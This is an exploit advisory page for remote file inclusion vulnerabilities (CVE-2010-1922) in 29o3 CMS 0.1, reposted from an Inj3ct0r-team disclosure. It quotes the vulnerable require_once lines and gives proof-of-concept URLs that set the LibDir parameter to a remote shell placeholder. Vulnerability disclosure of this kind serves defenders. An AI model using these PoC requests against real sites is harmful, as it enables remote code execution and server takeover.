29o3 CMS (LibDir) Multiple RFI Vulnerability

2010.05.14
Credit: eidelweiss
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

Multiple PHP remote file inclusion vulnerabilities in 29o3 CMS 0.1 allow remote attackers to execute arbitrary PHP code via a URL in the LibDir parameter to (1) lib/page/pageDescriptionObject.php, and (2) layoutHeaderFuncs.php, (3) layoutManager.php, and (4) layoutParser.php in lib/layout/. when processing the "LibDir" parameter, which could be exploited by remote attackers to include remote scripts and execute arbitrary commands with the privileges of the web server. ================================================ 29o3 CMS (LibDir) Multiple RFI Vulnerability ================================================ 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ######################################## 1 0 I'm eidelweiss member from Inj3ct0r Team 1 1 ######################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Download: http://prdownload.berlios.de/twonineothree/29o3_snapshot_20041026.tar.bz2 Author: eidelweiss Contact: eidelweiss[at]cyberservices.com Thank`s: r0073r & 0x1D (inj3ct0r) , JosS (Hack0wn), exploit-db team , [D]eal [C]yber Greetz: all inj3ctor Team, yogyacarderlink Team, devilzc0de & all INDONESIAN HACKER`s ======================================================================== Description: 29o3 is a management system for websites of all kinds. With 29o3 you are able to maintain websites with most complex layouts as fast as possible while concentrating on what to do, not how to do. License: BSD License Version: 29o3 0.1 Codename Broend PREBETA ======================================================================== -=[ VULN C0de ]=- [-] path/lib/page/pageDescriptionObject.php /* require_once($CONFIG['LibDir'] . 'db/' . $CONFIG['DatabaseType'] . '.php'); require_once($CONFIG['LibDir'] . 'xhtml/xhtmlheader.php'); require_once($CONFIG['LibDir'] . 'xhtml/xhtmlbody.php'); */ ======================================================================== [-] path/lib/layout/layoutHeaderFuncs.php require_once($CONFIG['LibDir'] . 'common.php'); require_once($CONFIG['LibDir'] . 'page/pageDescriptionObject.php'); require_once($CONFIG['LibDir'] . 'db/' . $CONFIG['DatabaseType'] . '.php'); ======================================================================== [-] path/lib/layout/layoutManager.php // include the layout parser/lexer require_once($CONFIG['LibDir'] . 'layout/layoutParser.php'); require_once($CONFIG['LibDir'] . 'page/pageDescriptionObject.php'); ======================================================================== [-] path/lib/layout/layoutParser.php require_once($CONFIG['LibDir'] . 'page/pageDescriptionObject.php'); require_once($CONFIG['LibDir'] . 'layout/layoutHeaderFuncs.php'); ======================================================================== -=[ P0C ]=- http://127.0.0.1/path/lib/page/pageDescriptionObject.php?LibDir=[inj3ct0r sh3ll] http://127.0.0.1/path/lib/layout/layoutHeaderFuncs.php?LibDir=[inj3ct0r sh3ll] http://127.0.0.1/path/lib/layout/layoutManager.php?LibDir=[inj3ct0r sh3ll] http://127.0.0.1/path/lib/layout/layoutParser.php?LibDir=[inj3ct0r sh3ll] =========================| -=[ E0F ]=- |=================================

References:

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-1922
http://www.securityfocus.com/archive/1/archive/1/511222/100/0/threaded
http://www.vupen.com/english/advisories/2010/1120
http://www.securityfocus.com/bid/40049
http://packetstormsecurity.org/1005-exploits/29o3cms-rfi.txt
http://securityreason.com/exploitalert/8231
http://www.juniper.net/security/auto/vulnerabilities/vuln40049.html
http://www.inj3ct0r.com/exploits/12190
http://www.exploit-db.com/exploits/12558


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top